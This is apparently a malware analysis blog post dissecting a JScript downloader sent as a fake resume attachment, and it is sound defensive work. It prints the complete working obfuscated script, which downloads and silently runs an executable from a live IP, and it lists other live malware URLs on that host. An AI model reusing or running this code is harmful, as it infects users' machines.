A friend received an email titled “Good morning” with the following contents:
I was visting your webpage on 5/5/2016 and I’m interested.
I’m currently looking for work either full time or as a volunteer to get experience in the field.
Please look over my Resume and let me know your thoughts.Regards,
—
Chaitanya Prabhat
The email also included an attachment named Resume_475.js, a JScript file. Double-clicking it on Windows does not open it in a browser: the .js extension is handled by wscript.exe (Windows Script Host), which runs the script as an ordinary program under the logged-in user's account. There is no browser sandbox and no Same-Origin Policy, and `new ActiveXObject(...)` hands it COM objects for network access (MSXML2.XMLHTTP), file I/O (ADODB.Stream, Scripting.FileSystemObject) and running commands (WScript.Shell) — exactly the four this sample instantiates once its strings are decoded.
The JavaScript file has basic obfuscation: lots of junk to make it harder to read at a glance (one-letter helper functions that return single characters, comma-expression lists such as `(5718, 3454, …, 1)` that simply evaluate to their last element, and a no-op switch), plus XOR-encoded strings rendered as runs of decimal digits. XOR against a short repeating key is obfuscation, NOT encryption: it hides the strings from grep and naive signatures, but the key sits in plain text in the same file. Each plaintext character is XORed with the key character at position (character index mod key length), and the result is written out as a zero-padded 3-digit decimal number. The decoder strips the leading zeros before calling parseInt() with no radix, so a triple like "028" is not mis-parsed as octal by older JScript engines.
028001035020121118067079068111069069101074117106066065095043007091050028038
Decoded one 3-digit triple at a time against the repeating key “tuWdCYlvpA” gives
http://94.102.63.7/js.exe
A quick WHOIS shows this IP belongs to Quasi Networks LTD. and also shows
remarks: *****************************************************************************
remarks: IMPORTANT INFORMATION
remarks: *****************************************************************************
remarks: We are a high bandwidth network provider offering bandwidth solutions.
remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
remarks: Please only use abuse@quasinetworks.com for abuse reports.
remarks: For all other requests, please see the details on our website.
remarks: *****************************************************************************
Searching for the IP on VirusTotal turns up a few more files hosted on the same address, including the following (treat these as live malware hosts — fetch them only from an isolated analysis VM, never from a production network):
http://94.102.63.7/11/file.exe
http://94.102.63.7/subid2.jpg (troll face meme face with the words “YOU MAD BRO?”)
http://94.102.63.7/11/subid6.jpg (looks like the same as subid2.jpg)
According to Quasi Networks’ website [EDIT: Website link is now broken 9/29/2020], and GeoLocation seems to agree, the server is likely somewhere in Amsterdam. Note that this only locates the hosting box, not whoever rented it; nothing here tells us where the actual sender sits.
At this point, I am handing off the links to a few friends who enjoy reversing actual executable files a bit more so they can have a bit of fun.
Here is the full contents of the .js file. Decoding every string with the key above shows what it does when run: it only proceeds if WScript.Interactive is true, fetches http://94.102.63.7/js.exe with a synchronous MSXML2.XMLHTTP GET, and on an HTTP 200 writes the response body through ADODB.Stream (binary mode) to a random name in the user's temp folder, runs it with WScript.Shell.run("cmd.exe /c <path>", 0) — i.e. with a hidden window — and finally deletes itself via FileSystemObject.deleteFile(WScript.ScriptFullName). The whole thing sits in a try/catch that swallows every error, so a failed download leaves no visible trace. Handle the listing as live malware; do not execute it outside an isolated VM.
// ---------------------------------------------------------------------------
// MALWARE SAMPLE -- Resume_475.js (WSH/JScript downloader). Do NOT run outside
// an isolated analysis VM. Reproduced byte-for-byte below; only comments added.
//
// Obfuscation notes (derived by reading the code, not by running it):
//   * Parenthesised comma lists such as (5718, 3454, ..., 1) evaluate to their
//     LAST element, so they are plain integer literals with junk in front.
//   * The one-letter helpers (LZf, NvtXy, ...) and the Rek/lMf/KEmYS tables
//     assemble method names: JVw() == "charCodeAt", nmOy() == "charAt",
//     Qpj() == "fromCharCode". CdwcObo(s, i) is s.charAt(i), ToLXgn(s, i) is
//     s.charCodeAt(i), zMwahg/XeRCefz wrap parseInt (no radix), kGOyT is %,
//     XSfbp is ^, Pqw divides by 3.
//   * jLnhR(s) is the string decoder: it walks s three decimal digits at a
//     time, strips leading zeros (tvqkM == bT compares the string "0" with 0
//     and is true, so "028" becomes "28", "001" becomes "1" -- this sidesteps
//     legacy octal parseInt on "0NN"), XORs the value with
//     key "tuWdCYlvpA"[(i/3) % 10] and appends String.fromCharCode(result).
//
// Strings decoded with that key (checked by hand, triple by triple):
//   028001035...050028038 -> http://94.102.63.7/js.exe      (payload URL)
//   057038015...033003052 -> MSXML2.XMLHTTP
//   039022037...020058001 -> ScriptFullName
//   016016059...031028036 -> deleteFile
//   039022037...001032045 -> Scripting.FileSystemObject
//   027005050010 -> open      051048003 -> GET      007016057000 -> send
//   039001054016054042 -> Status
//   053049024...002036021024 -> ADODB.Stream
//   051016035055...000038043 -> GetSpecialFolder   051016035048...044017 -> GetTempName
//   059005050010 -> Open      032012039001 -> Type   035007062016038 -> Write
//   038016036020...046016012 -> ResponseBody       036026036013...003024 -> Position
//   039020033001...031028036 -> SaveToFile         055025056023038 -> Close
//   035038052022...017025059 -> WScript.Shell      023024051074...034084 -> "cmd.exe /c "
//   006000057 -> run          061027035001...055017 -> Interactive
//
// Behaviour, in order (zeN plus the trailing try block):
//   1. Entry: EXPz(false, 662) is a no-op (no case matches), then zeN() runs
//      only if WScript.Interactive > 0 -- presumably to stay quiet under
//      non-interactive automation (cscript //B); confirm in a sandbox.
//   2. Synchronous GET of the payload URL via MSXML2.XMLHTTP (open(..., 0)).
//   3. If Status == 200: ADODB.Stream with Type = 1 (binary) writes
//      ResponseBody, rewinds (Position = 0) and SaveToFile's it to
//      GetSpecialFolder(2) + "\" + GetTempName() (the FSO temp folder), then
//      WScript.Shell.run("cmd.exe /c " + that path, 0) executes it with a
//      hidden window.
//   4. Unconditionally afterwards, FileSystemObject.deleteFile(
//      WScript.ScriptFullName) removes the script itself. The outer try/catch
//      swallows every error, so failures (e.g. no network) are silent.
// ---------------------------------------------------------------------------
function zMwahg(ysnMany) { var dno = [(5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1), parseInt, (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)][(5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)](ysnMany); return dno; } function LZf() { var eE = "f"; return eE; } function NvtXy() { var EPWt = "r"; return EPWt; } function jEbDYY() { var PWl = "C"; return PWl; } function BWSWmt() { var cmXkcn = "A"; return cmXkcn; } function MghMnn() { var FwtSDk = "o"; return FwtSDk; } function ZmSEan() { var NoHb = "c"; return NoHb; } function XLEhqFL() { var LGJq = "a"; return LGJq; } function DsQA() { var GKJv = "e"; return GKJv; } function MNEx() { var UdJhaU = "h"; return UdJhaU; } function KEmYS(tPtujZL) { var oBP = ZmSEan(); var UIofbb = MNEx(); var JcOv = XLEhqFL(); var xMeewN = NvtXy(); var dIENQ = BWSWmt(); var HaTjPD = "t"; var xR = [oBP + UIofbb, JcOv + xMeewN + dIENQ + HaTjPD][tPtujZL]; return xR; } function XeRCefz(Tda) { var zTE = zMwahg(Tda); return zTE; } function Rek(mxS) { var WsE = [ZmSEan(), "h", XLEhqFL(), NvtXy(), jEbDYY(), MghMnn(), "d", DsQA(), "A", "t"]; return WsE[mxS]; } function JVw() { var QqJUNx = Rek((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + Rek((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) + Rek((499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) + Rek((9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3)) + Rek((2337, 9079, 3126, 6818, 4)) + Rek((1228, 7692, 6597, 6292, 2492, 7345, 3051, 865, 7787, 712, 5)) + Rek((7655, 378, 283, 6)) + Rek((4337, 4725, 923, 6042, 8716, 8094, 110, 3724, 7601, 7)) + Rek((5958, 9934, 5911, 9079, 6752, 3398, 307, 4443, 9991, 8)) + Rek((6930, 7335, 9640, 7791, 5122, 352, 8864, 2776, 726, 9)); return QqJUNx; } function nmOy() { var RgYE = KEmYS((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + KEmYS((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)); return RgYE; } function CdwcObo(PTWeXHxM, RWb) { var EmXxvNbA = PTWeXHxM; var TLK = 
RWb; var pTIHyny = EmXxvNbA[nmOy()](TLK); return pTIHyny; } function ToLXgn(ZUHZVU, NZtnZ) { var WtCuOtA = ZUHZVU[JVw()](NZtnZ); return WtCuOtA; } function lMf(FsRGoGz) { var YwrkuOG = [LZf(), NvtXy(), MghMnn(), "m", jEbDYY(), "h", XLEhqFL(), NvtXy(), jEbDYY(), MghMnn(), "d", DsQA()]; return YwrkuOG[FsRGoGz]; } function Qpj() { var Ph = lMf((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + lMf((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) + lMf((499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) + lMf((9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3)) + lMf((2337, 9079, 3126, 6818, 4)) + lMf((1228, 7692, 6597, 6292, 2492, 7345, 3051, 865, 7787, 712, 5)) + lMf((7655, 378, 283, 6)) + lMf((4337, 4725, 923, 6042, 8716, 8094, 110, 3724, 7601, 7)) + lMf((5958, 9934, 5911, 9079, 6752, 3398, 307, 4443, 9991, 8)) + lMf((6930, 7335, 9640, 7791, 5122, 352, 8864, 2776, 726, 9)) + lMf((4591, 2339, 529, 9217, 2657, 1660, 5024, 9261, 10)) + lMf((8185, 193, 4475, 4816, 9381, 9747, 7772, 4172, 11)); return Ph; } function kGOyT(UagV, gPmgLg) { var leHaTjPDs = UagV % gPmgLg; return leHaTjPDs; } function XSfbp(ygWMgH, yyYNe) { var WcP = ygWMgH ^ yyYNe; return WcP; } function Pqw(YPVQY) { var pokm = YPVQY / (9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3); return pokm; } /* analyst: jLnhR = XOR string decoder (3-digit decimal triples, key 'tuWdCYlvpA'), see header */ function jLnhR(LZl) { var NGvhgi = ''; var Dz = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var XnXf = 'tuWdCYlvpA'; var ex = XnXf.length; var WAgewiU = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var yicKQQr = ""; var Xyu = LZl.length; while (WAgewiU < Xyu - (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) { var bT = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var Zhre = WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1); var wBW = CdwcObo(LZl, Zhre); var cdxy = CdwcObo(LZl, WAgewiU + (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)); var rrK = 
CdwcObo(LZl, WAgewiU); yicKQQr = rrK + wBW + cdxy; var tvqkM = CdwcObo(LZl, WAgewiU); var HaM102 = (CdwcObo(LZl, WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) == (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)); if (tvqkM == bT) { var GmXYriu = WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1); var fNViluuD = WAgewiU + (2); var edfAup = CdwcObo(LZl, fNViluuD); yicKQQr = CdwcObo(LZl, GmXYriu) + edfAup; } var Wxy = CdwcObo(LZl, WAgewiU); var HaM101 = (Wxy == (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)); if (HaM101 && HaM102) { var JhTxccI = WAgewiU + (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2); yicKQQr = CdwcObo(LZl, JhTxccI); } Dz = XeRCefz('' + yicKQQr + ''); var wmhBq = Pqw(WAgewiU); var bKC = kGOyT(wmhBq, ex); var HaM = ToLXgn(XnXf, bKC); Dz = XSfbp(Dz, HaM); var Jxjau = Qpj(); var pJEZQxx = String; NGvhgi = NGvhgi + pJEZQxx[Jxjau](Dz); var zgqWsyxI = (9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3); WAgewiU = WAgewiU + zgqWsyxI; } return NGvhgi; } /* analyst: NUVNBx -> ActiveXObject, xKsEcMr(progid) -> new ActiveXObject(progid), Ywq -> WScript, JVzcXj -> payload URL, RVclJQ -> "MSXML2.XMLHTTP", EEH(fso, path) -> fso.deleteFile(path) */ function NUVNBx() { var JPFaBoW = [(7996, 8394, 4646, 1), ActiveXObject, (8912, 8158, 2)][1]; return JPFaBoW; } function xKsEcMr(dfegg) { var qT = NUVNBx(); var qSG = new qT(dfegg); return qSG; } function JVzcXj() { var HyCKKm = jLnhR("028001035020121118067079068111069069101074117106066065095043007091050028038"); return HyCKKm; } function Ywq() { var PQgxT = [(7996, 8394, 4646, 1), WScript, (8912, 8158, 2)][1]; return PQgxT; } function RVclJQ() { var CGylvd = jLnhR("057038015041015107066046061013060033003052"); return CGylvd; } function EEH(dldd, lfdff) { dldd[jLnhR("016016059001055060042031028036")](lfdff); } /* analyst: zeN is the dropper -- GET payload, save to temp folder, run via "cmd.exe /c" with hidden window, then delete this script (WScript.ScriptFullName) */ function zeN() { var Xrh = RVclJQ(); var IbiYUPFC = Ywq(); var inX = IbiYUPFC[jLnhR("039022037013051045042003028045058020058001")]; var ONlU = JVzcXj(); var eAM = xKsEcMr(Xrh); var YXgbjd = jLnhR("053049024032001119063002002036021024"); var rbbs = jLnhR("051048003"); eAM[jLnhR("027005050010")](rbbs, ONlU, 
/* analyst: xhr.open("GET", url, 0) -- third arg 0 = synchronous */ 0); var anY = jLnhR("007016057000"); eAM[anY](); var PmNcki = jLnhR("039022037013051045005024023111050028059001016032031002021044059023061001032045"); var XtLiylV = xKsEcMr(PmNcki); if (eAM[jLnhR("039001054016054042")] == (9683, 2956, 3237, 8709, 8382, 7051, 9350, 8457, 3109, 200)) { var kTo = xKsEcMr(YXgbjd); var csF = XtLiylV[jLnhR("051016035055051060015031017045050026059000038043")]((8912, 8158, 2)) + '\\' + XtLiylV[jLnhR("051016035048038052028056017044017")](); kTo[jLnhR("059005050010")](); var tGMC = jLnhR("035038052022042041024088035041017025059"); kTo[jLnhR("032012039001")] = (7996, 8394, 4646, 1); var aBmPNa = xKsEcMr(tGMC); kTo[jLnhR("035007062016038")](eAM[jLnhR("038016036020044055031019050046016012")]); var XiIUCtd = (2972, 4686, 2971, 1428, 7790, 0); kTo[jLnhR("036026036013055048003024")] = XiIUCtd; kTo[jLnhR("039020033001023054042031028036")](csF); kTo[jLnhR("055025056023038")](); var FY = jLnhR("023024051074038033009086095034084") + csF; aBmPNa[jLnhR("006000057")](FY, (2972, 4686, 2971, 1428, 7790, 0)); } EEH(XtLiylV, inX); } /* analyst: EXPz is padding -- called once with (false, 662), no case matches, nothing escapes the function */ function EXPz(wJLujN, KVF) { switch (KVF) { case 56: var WvlC = 45223; break; case 1: if (wJLujN === "GyvgO") { var NypQNov = true; } break; case 0: var PXn = "VCuxN"; break; case 0: var YNzQfgo = 45872; if (YNzQfgo == "cMRSJfo") { } break; case false: var oxWsg = false; break; }; var hQkIdnB = "qnJjXOy"; var dOPkd = "pgKk"; if (dOPkd == false) { var IxwZL = "iIUH"; } } /* analyst: entry point -- zeN() runs only when WScript.Interactive > 0; the empty catch swallows every error */ try { EXPz(false, 662); var th = ([(4060, 6502, 2376, 2327, 8217, 4605, 0), WScript])[(7768, 4840, 2158, 1)]; var EvoZsSI = th[jLnhR("061027035001049056015002025055017")]; var pHBvQkq = EvoZsSI > (4060, 6502, 2376, 2327, 8217, 4605, 0); if (pHBvQkq) { [(7768, 4840, 2158, 1), zeN][(7768, 4840, 2158, 1)](); } } catch (OlizFZZ) {}